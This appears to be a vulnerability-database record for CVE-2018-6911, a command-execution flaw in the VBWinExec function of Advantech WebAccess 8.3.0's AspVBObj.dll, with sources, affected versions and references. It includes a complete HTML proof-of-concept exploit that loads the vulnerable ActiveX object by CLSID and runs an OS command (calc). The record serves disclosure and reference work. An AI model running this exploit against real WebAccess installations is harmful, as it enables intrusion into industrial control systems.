ID

VAR-E-201802-0086


CVE

cve_id:CVE-2018-6911

Trust: 1.5

sources: PACKETSTORM: 146360 // EXPLOIT-DB: 44031

EDB ID

44031


TITLE

Advantech WebAccess 8.3.0 - Remote Code Execution - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44031

DESCRIPTION

Advantech WebAccess 8.3.0 - Remote Code Execution. CVE-2018-6911 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 44031

AFFECTED PRODUCTS

vendor:advantechmodel:webaccessscope:eqversion:8.3.0

Trust: 1.6

vendor:advantechmodel:webaccess nodescope:eqversion:8.3.0

Trust: 0.5

sources: PACKETSTORM: 146360 // EXPLOIT-DB: 44031 // EDBNET: 96584

EXPLOIT

Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution

Discovered by: Nassim Asrir

Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/

CVE: CVE-2018-6911

Tested on: IE11 / Win10

Technical Details:
==================

The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.

Vulnerable File: C:\WebAccess\Node\AspVBObj.dll

Vulnerable Function: VBWinExec

Vulnerable Class: Include

Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.

Function VBWinExec (
ByRef command As String
)

Exploit:
========

<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>

<SCRIPT>

function exploit()
{

rce.VBWinExec("calc")


}

</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>

Trust: 1.0

sources: EXPLOIT-DB: 44031

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 44031

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44031

TYPE

Remote Code Execution

Trust: 1.6

sources: EXPLOIT-DB: 44031 // EDBNET: 96584

TAGS

tag:exploit

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 146360

CREDITS

Nassim Asrir

Trust: 0.6

sources: EXPLOIT-DB: 44031

EXTERNAL IDS

db:EXPLOIT-DBid:44031

Trust: 1.6

db:NVDid:CVE-2018-6911

Trust: 1.5

db:EDBNETid:96584

Trust: 0.6

db:PACKETSTORMid:146360

Trust: 0.5

sources: PACKETSTORM: 146360 // EXPLOIT-DB: 44031 // EDBNET: 96584

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-6911

Trust: 1.5

url:https://www.exploit-db.com/exploits/44031/

Trust: 0.6

sources: PACKETSTORM: 146360 // EXPLOIT-DB: 44031 // EDBNET: 96584

SOURCES

db:PACKETSTORMid:146360
db:EXPLOIT-DBid:44031
db:EDBNETid:96584

LAST UPDATE DATE

2022-07-27T09:15:05.665000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:146360date:2018-02-12T01:11:11
db:EXPLOIT-DBid:44031date:2018-02-13T00:00:00
db:EDBNETid:96584date:2018-02-13T00:00:00